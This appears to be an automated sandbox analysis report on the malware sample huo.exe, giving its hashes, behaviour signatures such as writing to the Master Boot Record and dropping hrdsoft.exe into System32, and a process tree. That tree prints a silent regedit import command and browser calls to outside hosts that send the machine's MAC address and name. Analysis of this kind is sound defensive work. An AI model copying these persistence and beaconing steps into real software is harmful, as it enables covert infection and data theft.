Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/02/2024, 08:39

General

  • Target

    huo.exe

  • Size

    85KB

  • MD5

    abc1a6cedb451694d573a61be7cb0d33

  • SHA1

    a1a1741dcb4a5589ba07bab5931073aeee5275f5

  • SHA256

    a35a56366604e755cca7583f94fc0a851b736beb569615d07fb2ff0c81e48986

  • SHA512

    41d3d98baeaf4931388b9231a79fbc5f284755a9c75d5d91ad2716b3e78e501dc9668d7fe0e9cfc6fcac5d45f869b2f9e75779e748e8719d21aeaadb95bc3133

  • SSDEEP

    1536:xF4mvWAvxyR5UNATpYRGST7/aN0o88FwbWcK4bqTpAj09m:omTxyRPpY4ST7/aNf8PbWcK4buW04

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 14 IoCs
  • Modifies Internet Explorer settings 1 TTPs 25 IoCs
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\huo.exe
    "C:\Users\Admin\AppData\Local\Temp\huo.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.the9q.com/tong/get.asp?mac=EA08C850D01B&makedate=QM00013&comput=Home&ver=89&userid=0008
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1812 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4868
    • C:\Windows\SysWOW64\hrdsoft.exe
      C:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\huo.exe===
      2⤵
      • Executes dropped EXE
      • Writes to the Master Boot Record (MBR)
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:416
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1692
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
          4⤵
          • Modifies registry class
          • Runs .reg file with regedit
          PID:2316
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38078.comget.asp?mac=EA08C850D01B&makedate=QM00013&comput=Home&ver=91&userid=0
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:928
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:928 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:4836

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{ECC16708-D614-11EE-BC63-EA08C850D01B}.dat

    Filesize

    5KB

    MD5

    aa35222e055d9fd3069e4e13abd39fe2

    SHA1

    07350a6c3e31f5a136ab936367a1e44bfafa52d4

    SHA256

    a42179bb7ad1ac609ac375b4add52b7b863f8e033f94b3c7025ab1498fa63f38

    SHA512

    570d702a0ee44dda0f44c31ad5157d3e840f92ffa90d90d9e29c6e1ca832a135efbfa8c983ce2c4227bca5ece825efbf73a6f7ecb389a80aa704ef012cda015f

  • C:\Users\Admin\AppData\Local\Temp\getback.reg

    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

  • C:\Windows\SysWOW64\hrdsoft.exe

    Filesize

    16KB

    MD5

    82f1268aa2f982ffc0c90c441e290f5f

    SHA1

    9c31fc2900f909a26107e40a62a358123768fb88

    SHA256

    3524a85048ffdb2c373583799ed2c0e5c5e6d573827356227603a71adf6b5d78

    SHA512

    9c47bb24e8357300ca441e447999b260529dfb0f97093b7baf44f4ccd3776d2e41a1a4d84c27a19183c4af1575cb873b1293547945ca16416ae4f4104cf4d5c5

  • memory/416-28-0x00000000001C0000-0x00000000001C1000-memory.dmp

    Filesize

    4KB

  • memory/416-26-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

  • memory/416-40-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

  • memory/468-0-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/468-1-0x00000000001C0000-0x00000000001C2000-memory.dmp

    Filesize

    8KB

  • memory/468-39-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB